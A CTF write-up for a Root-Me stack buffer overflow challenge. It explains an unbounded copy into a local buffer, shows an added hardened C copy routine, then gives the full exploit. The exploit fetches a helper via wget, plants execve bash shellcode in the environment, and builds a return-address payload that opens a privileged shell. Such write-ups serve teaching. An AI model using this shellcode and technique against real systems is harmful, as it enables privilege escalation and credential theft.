Stack buffer overflow basic 5
ELF x86 - Stack buffer overflow basic 5
Source

    while(fgets(buff, BUFFER, file) != NULL)
The data is read into buff at ebp-0x2a5, and only 512 characters plus the '\n' can be read, so the read itself cannot reach EIP. But this code then assigns the data to init without any bounds check, and init starts at ebp-0xa4, which is quite close to the saved registers, so it is easy to overflow.
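The two defects described above, a bounded fgets() read followed by an unbounded copy into a smaller local buffer, are illustrated in the following added C example; it is not code from the challenge binary or from either linked writeup. The 512-byte BUFFER comes from the page; INIT_SIZE, the function names and the use of memcpy are assumptions, since the page does not show the copy itself. The hardened copy_line_bounded() truncates to the destination size, always NUL-terminates, drops the newline that fgets() keeps, and reports truncation so the caller can reject the line instead of working with a partial one.

```c
#include <stdio.h>
#include <string.h>

#define BUFFER 512      /* size of the fgets() line buffer (from the page) */
#define INIT_SIZE 128   /* assumed size of the smaller local buffer "init" */

/* The unchecked shape the page describes (assumed; the exact copy call is not
   shown there) would be something like:
       strcpy(init, buff);
   With buff holding up to 511 bytes and init holding INIT_SIZE, anything past
   INIT_SIZE - 1 bytes overwrites whatever sits above init in the frame. */

/* Hardened copy: bounded by the destination size, always NUL-terminated,
   trailing newline removed. Returns 0 on success, -1 if the input had to be
   truncated, so the caller can treat an over-long line as invalid input. */
static int copy_line_bounded(char *init, size_t init_size, const char *buff) {
    size_t n = strlen(buff);
    if (n > 0 && buff[n - 1] == '\n')
        n--;                          /* drop the newline fgets() keeps */
    int truncated = (n >= init_size);
    if (truncated)
        n = init_size - 1;            /* leave room for the terminator */
    memcpy(init, buff, n);
    init[n] = '\0';
    return truncated ? -1 : 0;
}

/* Reads one line from `file` into a BUFFER-sized buffer, as the page's loop
   does, then copies it with the bounded routine. Returns the copy status
   (0 or -1), or -2 at end of file. */
static int read_one_line(FILE *file, char *init, size_t init_size) {
    char buff[BUFFER];
    if (fgets(buff, BUFFER, file) == NULL)
        return -2;
    return copy_line_bounded(init, init_size, buff);
}

int main(int argc, char **argv) {
    char init[INIT_SIZE];
    FILE *file = (argc > 1) ? fopen(argv[1], "r") : stdin;
    if (file == NULL)
        return 1;
    int rc;
    while ((rc = read_one_line(file, init, sizeof init)) != -2) {
        if (rc == -1)
            fprintf(stderr, "line too long, rejected (kept %zu bytes)\n", strlen(init));
        else
            printf("ok: %s\n", init);
    }
    return 0;
}
```

The return value is the part worth keeping: a copy that silently truncates is safe from overflow but still lets malformed input reach the rest of the program, so the loop above rejects such lines explicitly.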
Problem
At the end of the function, the local variable init is written back to the address of the outer init, which sits at $ebp+0x8 and holds the value 0xbffffb00. Because the trailing '\n' in buff is turned into '\00', for the shellcode to execute, $ebp+0x8 also has to be appended after it; at that point there happens to be a '00' there, so it runs even without appending the address, but in the end it still segfaults.
https://github.com/s1syphu5/RootMe-Challenges/tree/master/System/ELF%20x86%20-%20Stack%20buffer%20overflow%20basic%205
In the end I used the method from this post:
https://finsenty54.github.io/2020/12/29/stack_buffer_overflow_basic_4/
Exploit
wget https://raw.githubusercontent.com/Finsenty54/-python/master/findenv.c
gcc -o findenv findenv.c
export JUNK=$(python -c "print 'B' * 1000")
export SHELCODE=$(python -c 'print("\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80")')
/tmp/findenv JUNK ./ch10
JUNK will be at 0xbffffac2
/tmp/findenv SHELCODE ./ch10
SHELCODE will be at 0xbfffff4d
python -c "print 'USERNAME='+'\x90'*136+'\x60\xb1\x04\x08'+'A'*28+'\x4d\xff\xff\xbf'+'\xc2\xfa\xff\xbf'" > /var/tmp/data.txt
app-systeme-ch10@challenge02:~$ ./ch10 /var/tmp/data.txt
bash-4.4$ id
uid=1110(app-systeme-ch10) gid=1110(app-systeme-ch10) euid=1210(app-systeme-ch10-cracked) groups=1110(app-systeme-ch10),100(users)
bash-4.4$ cat .passwd